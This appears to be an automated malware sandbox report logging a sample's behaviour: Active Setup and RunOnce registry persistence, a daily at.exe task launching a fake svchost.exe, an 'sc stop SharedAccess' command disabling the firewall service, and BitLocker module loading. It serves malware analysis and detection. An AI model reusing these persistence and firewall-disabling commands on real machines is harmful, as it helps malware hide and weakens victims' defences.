Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System\svchost.exe

Process created: C:\Windows\SysWOW64\at.exe at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe

Source: C:\Windows\System\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess

Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\System\explorer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior

Source: C:\Windows\System\svchost.exe

Process created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
